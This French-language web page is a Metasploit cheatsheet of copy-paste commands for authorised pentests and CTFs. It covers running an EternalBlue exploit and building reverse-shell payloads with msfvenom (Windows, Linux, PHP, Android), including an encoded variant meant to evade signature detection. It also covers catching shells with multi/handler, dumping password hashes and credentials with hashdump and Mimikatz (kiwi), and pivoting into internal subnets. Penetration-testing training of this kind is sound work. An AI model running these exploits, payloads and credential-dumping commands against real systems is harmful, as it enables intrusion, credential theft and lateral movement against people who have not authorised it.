Metasploit — Cheatsheet 2026

Toutes les commandes du Metasploit Framework — workflow msfconsole, payloads msfvenom, Meterpreter, gestion des sessions, handlers et pivoting. Prêt à copier-coller pour CTF, labs et pentests autorisés.

Dernière mise à jour :

Débutant ? Lisez notre guide complet pour débuter et situez Metasploit dans la méthodologie.

Navigation rapide

01 Démarrage & base de données 02 Rechercher des modules 03 Workflow d'exploitation 04 Payloads 05 multi/handler 06 msfvenom 07 Meterpreter 08 Sessions 09 Post-exploitation 10 Pivoting

# Démarrage & base de données

Initialisez d'abord la base PostgreSQL — elle stocke hôtes, services et butin, et accélère beaucoup la recherche.

sudo msfdb init
Initialiser la base PostgreSQL de Metasploit (une fois)
msfconsole -q
Lancer la console en mode silencieux (sans bannière)
db_status
Vérifier la connexion à la base
db_nmap -sV -sC 10.10.10.5
Lancer nmap depuis msf et stocker les résultats dans la base
hosts; services
Lister les hôtes et services découverts depuis la base
workspace -a client_x
Créer un espace de travail isolé par mission

# Le workflow d'exploitation

La boucle centrale : use → régler les options → check → exploit. Même schéma pour chaque module.

use exploit/windows/smb/ms17_010_eternalblue
Sélectionner un module exploit
show options
Lister les réglages requis et optionnels
set RHOSTS 10.10.10.5
Définir le(s) hôte(s) cible
set LHOST tun0
Définir votre IP listener — utilisez le nom d'interface pour l'auto-résoudre
set LPORT 443
Définir le port du listener
check
Tester si la cible est vulnérable sans exploiter (si supporté)
exploit -j
Lancer l'exploit en tâche de fond

# Payloads

Choisissez un payload adapté à la cible et à votre réseau. Staged (/) nécessite un stager ; stageless (_) est un blob autonome unique.

show payloads
Lister les payloads compatibles avec l'exploit sélectionné
set payload windows/x64/meterpreter/reverse_tcp
Meterpreter staged en reverse TCP
set payload windows/x64/meterpreter_reverse_https
Meterpreter stageless en HTTPS — meilleur à travers proxys/pare-feux
set payload linux/x64/shell_reverse_tcp
Reverse shell simple (quand Meterpreter n'est pas dispo)
💡 Astuce : Staged (windows/.../reverse_tcp) envoie d'abord un petit stager ; stageless (meterpreter_reverse_tcp) est un seul blob — plus fiable sur des liens instables.

# multi/handler — attraper n'importe quel shell

Utilisez le handler pour recevoir la connexion d'un payload généré avec msfvenom ou déposé manuellement.

use exploit/multi/handler
Sélectionner le handler générique de payload
set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 443; run
Configurer pour correspondre à votre payload et démarrer l'écoute
msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 443; run"
One-liner pour lancer un handler directement depuis le shell
set ExitOnSession false
Garder le handler actif pour attraper plusieurs shells

# msfvenom — générer des payloads

Créez des fichiers payload autonomes dans n'importe quel format. Attrapez-les avec un multi/handler correspondant.

msfvenom -l payloads
Lister tous les payloads disponibles
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=443 -f exe -o shell.exe
Exécutable Meterpreter Windows
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f elf -o shell.elf
ELF reverse shell Linux
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=443 -f raw -o shell.php
Meterpreter PHP pour upload web
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=443 -f exe -e x64/xor_dynamic -i 5 -o enc.exe
Encodé pour échapper à la détection par signature basique
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=443 -o app.apk
APK Meterpreter Android

# Commandes Meterpreter

Une fois une session Meterpreter obtenue, voici les commandes du quotidien.

sysinfo; getuid
Infos OS et utilisateur courant
getsystem
Tenter une élévation de privilèges automatique vers SYSTEM
getprivs
Lister les privilèges du token courant
hashdump
Extraire les hash de mots de passe du SAM local (nécessite SYSTEM)
upload /tmp/winPEAS.exe C:\\Windows\\Temp\\
Envoyer un fichier vers la cible
download C:\\Users\\admin\\Desktop\\proof.txt
Télécharger un fichier depuis la cible
shell
Basculer vers un shell OS natif (exit pour revenir à Meterpreter)
migrate -N explorer.exe
Migrer vers un processus stable par nom
load kiwi; creds_all
Charger l'extension Mimikatz (kiwi) et extraire les identifiants

# Gestion des sessions

Jonglez entre plusieurs shells et améliorez les shells basiques en Meterpreter.

sessions -l
Lister toutes les sessions actives
sessions -i 1
Interagir avec la session 1
Ctrl+Z
Mettre la session courante en arrière-plan (la garde active)
sessions -u 2
Améliorer un shell basique (session 2) en Meterpreter
sessions -c "whoami" -i 1
Lancer une commande sur une session sans interagir
sessions -K
Tuer toutes les sessions

# Modules de post-exploitation

Lancez des modules post contre une session existante pour l'énumération et la persistance.

run post/multi/recon/local_exploit_suggester
Suggérer des exploits d'élévation locale pour la session
run post/windows/gather/enum_logged_on_users
Énumérer les utilisateurs connectés
run post/windows/manage/migrate
Migration automatique vers un processus plus sûr
run post/multi/manage/shell_to_meterpreter
Améliorer une session shell en Meterpreter

# Pivoting

Utilisez un hôte compromis comme passerelle vers des sous-réseaux internes inaccessibles directement.

run autoroute -s 10.10.20.0/24
Ajouter une route vers un sous-réseau interne via la session
use post/multi/manage/autoroute; set SESSION 1; run
Idem via le module post
use auxiliary/server/socks_proxy; set SRVPORT 1080; run -j
Démarrer un proxy SOCKS pour les outils hors Metasploit
proxychains nmap -sT -Pn 10.10.20.10
Router des outils externes via le pivot avec proxychains
portfwd add -l 3389 -p 3389 -r 10.10.20.10
Rediriger un port de la cible vers votre machine locale

❓ FAQ Metasploit

Le framework de pentest le plus utilisé — des milliers d'exploits, payloads, modules auxiliaires et post derrière une console (msfconsole). On cherche un module, on règle ses options (RHOSTS, LHOST) et on le lance.

msfconsole est la console interactive pour lancer les modules. msfvenom génère des fichiers payload autonomes (exe, elf, php, apk). On génère souvent avec msfvenom et on attrape avec un multi/handler.

Le payload avancé en mémoire de Metasploit. Il offre transfert de fichiers, getsystem, hashdump, capture d'écran, keylogging et pivoting — sans écrire sur le disque, plus discret qu'un simple shell.

use exploit/multi/handler, réglez payload pour correspondre à votre payload msfvenom, réglez LHOST/LPORT, puis run. Il attrape la connexion entrante et ouvre une session.

sessions -l liste, sessions -i ID interagit, Ctrl+Z met en arrière-plan. Lancez sans interagir via sessions -c 'whoami' -i ID, améliorez un shell avec sessions -u ID.

Depuis Meterpreter, run autoroute -s 10.10.20.0/24, puis utilisez des scanners auxiliaires en interne, ou démarrez auxiliary/server/socks_proxy et pointez proxychains dessus.

Vous pouvez utiliser Metasploit/Meterpreter sur une seule cible de votre choix ; c'est restreint ailleurs, donc maîtrisez l'exploitation manuelle. msfvenom pour les payloads est généralement autorisé — vérifiez les règles en vigueur.

Sous Kali : sudo apt update && sudo apt install metasploit-framework. Depuis l'installeur Rapid7, utilisez msfupdate. Puis lancez msfconsole et reload_all pour reconstruire le cache des modules.

📚 Ressources liées

Rapport de pentest assisté par IA

Transformez vos sessions Metasploit en rapport PDF professionnel. L'IA remplit CVE, CVSS et sévérité.

Essayer gratuitement →

Envie des 12 020+ commandes ?

Cette cheatsheet Metasploit n'est qu'une branche de la carte. Pentest Mindmap organise 12 020+ commandes en 34 catégories — de la recon à la post-exploitation — avec recherche instantanée et copie en un clic.

Commencer gratuitement →